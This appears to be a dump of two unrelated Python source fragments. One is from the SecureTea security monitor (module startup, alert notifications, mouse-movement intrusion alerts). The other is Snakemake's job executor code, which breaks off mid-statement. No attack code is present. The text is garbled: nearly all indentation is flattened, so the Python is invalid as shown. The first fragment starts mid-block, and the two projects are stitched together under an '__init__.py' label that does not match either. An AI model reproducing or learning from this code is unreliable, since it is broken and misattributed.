if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided:
antivirus = self.cred['antivirus']
try:
antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus)
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
        while True:
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
                while True:
                    # Start the mouse event listener
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
        except KeyboardInterrupt:
            self.logger.log(
                "You pressed Ctrl+C! Bye")
            sys.exit(0)
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
                while True:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
        except KeyboardInterrupt:
            self.logger.log(
                "You pressed Ctrl+C! Bye")
            sys.exit(0)
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
        except KeyboardInterrupt:
            self.logger.log(
                "You pressed Ctrl+C! Bye")
            sys.exit(0)
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2022, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
import threading
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = workflow.latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_resources_args(self):
if self.workflow.overwrite_resources:
return " --set-resources {} ".format(
" ".join(
"{}:{}={}".format(rule, name, value)
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
)
)
return ""
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self, default_resources=None):
if default_resources is None:
default_resources = self.workflow.default_resources
if default_resources:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_local_groupid_arg(self):
return f" --local-groupid {self.workflow.local_groupid} "
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
        This method can be overridden to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
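    # A minimal sketch (not part of the original code) of how a subclass could
    # override run_jobs() to batch submissions while still honoring the
    # per-job callback contract described above; batch_submit() is a
    # hypothetical helper:
    #
    #     def run_jobs(self, jobs, callback=None, submit_callback=None,
    #                  error_callback=None):
    #         self.batch_submit(jobs)          # hypothetical bulk submission
    #         for job in jobs:
    #             submit_callback(job)         # still called once per job
    #         # callback(job) / error_callback(job) are then fired per job by
    #         # a status-polling loop once each job finishes or fails.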
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_frontend:
additional += " --conda-frontend {} ".format(
self.workflow.conda_frontend
)
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.conda_base_path and self.assume_shared_fs:
additional += " --conda-base-path {} ".format(
self.workflow.conda_base_path
)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows "
if self.workflow.max_threads is not None:
additional += " --max-threads {} ".format(self.workflow.max_threads)
additional += self.get_set_resources_args()
additional += self.get_set_scatter_args()
additional += self.get_set_threads_args()
additional += self.get_behavior_args()
if self.workflow.use_env_modules:
additional += " --use-envmodules "
if not self.keepmetadata:
additional += " --drop-metadata "
return additional
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
        if self.workflow.overwrite_configfiles:
            # add each of the overwriting configfiles in the original order
            overwrite_config.append("--configfiles")
            overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
cores=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_local_groupid_arg(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
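        # For illustration only (paths and flags are assumptions): once
        # format_job_pattern() fills the placeholders above, the spawned
        # command looks roughly like
        #   cd /path/to/workdir && /usr/bin/python3 -m snakemake <target> \
        #       --snakefile Snakefile --force --cores 1 --keep-target-files \
        #       ... --notemp --quiet --no-hooks --nolock --mode <Mode.subprocess>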
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = (
job.conda_env.address if self.workflow.use_conda and job.conda_env else None
)
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook if self.dag.is_edit_notebook_job(job) else None,
self.workflow.conda_base_path,
job.rule.basedir,
self.workflow.sourcecache.runtime_cache_path,
)
def run_single_job(self, job):
if (
self.use_threads
or (not job.is_shadow and not job.is_run)
or job.is_template_engine
):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe or service group job.
This lets all items run simultaneously."""
# we only have to consider pipe or service groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
n_non_service = sum(1 for j in job if not j.is_service)
while True:
n_finished = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
n_finished += 1
if n_finished >= n_non_service:
# terminate all service jobs since all consumers are done
for j in job:
if j.is_service:
logger.info(
f"Terminating service job {j.jobid} since all consuming jobs are finished."
)
shell.terminate(j.jobid)
logger.info(
f"Service job {j.jobid} has been successfully terminated."
)
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"{waitfiles_parameter:u} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock {scheduler_solver_path:u} ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
self.exec_job += " {job_specific_args:u} "
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
scheduler_solver_path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
            # Pass the directory of the current Python executable so that the
            # Snakemake process on the cluster node prepends it to PATH and thus
            # runs in the same environment as the current process.
            # This is necessary in order to find the pulp solver backends (e.g. coincbc).
scheduler_solver_path = "--scheduler-solver-path {}".format(
os.path.dirname(sys.executable)
)
        # Only create an extra file if there are more than 20 files to wait for.
        # This avoids creating the file in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
fd.write("\n".join(wait_for_files))
waitfiles_parameter = format(
"--wait-for-files-file {wait_for_files_file}",
wait_for_files_file=repr(wait_for_files_file),
)
else:
waitfiles_parameter = format(
"--wait-for-files {wait_for_files}",
wait_for_files=[repr(f) for f in wait_for_files],
)
job_specific_args = ""
if job.is_group():
job_specific_args = f"--local-groupid {job.jobid}"
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
waitfiles_parameter=waitfiles_parameter,
scheduler_solver_path=scheduler_solver_path,
job_specific_args=job_specific_args,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
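    # Hedged example of a cluster config consumed by cluster_params() above
    # (keys and values are illustrative assumptions):
    #
    #   __default__:
    #     queue: short
    #     name: "smk.{rule}"
    #   bwa_map:
    #     queue: long
    #
    # Rule-specific entries override __default__, string values are formatted
    # with the job's wildcards, and the result is exposed to the submit command
    # as {cluster.<key>} via cluster_wildcards() below.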
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cancelcmd=None,
cancelnargs=None,
sidecarcmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.cancelcmd = cancelcmd
self.sidecarcmd = sidecarcmd
self.cancelnargs = cancelnargs
self.external_jobid = dict()
# We need to collect all external ids so we can properly cancel even if
# the status update queue is running.
self.all_ext_jobids = list()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.sidecar_vars = None
if self.sidecarcmd:
self._launch_sidecar()
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def _launch_sidecar(self):
def copy_stdout(executor, process):
"""Run sidecar process and copy it's stdout to our stdout."""
while process.poll() is None and executor.wait:
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
# one final time ...
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
def wait(executor, process):
while executor.wait:
time.sleep(0.5)
process.terminate()
process.wait()
logger.info(
"Cluster sidecar process has terminated (retcode=%d)."
% process.returncode
)
logger.info("Launch sidecar process and read first output line.")
process = subprocess.Popen(
self.sidecarcmd, stdout=subprocess.PIPE, shell=False, encoding="utf-8"
)
self.sidecar_vars = process.stdout.readline()
while self.sidecar_vars and self.sidecar_vars[-1] in "\n\r":
self.sidecar_vars = self.sidecar_vars[:-1]
logger.info("Done reading first output line.")
thread_stdout = threading.Thread(
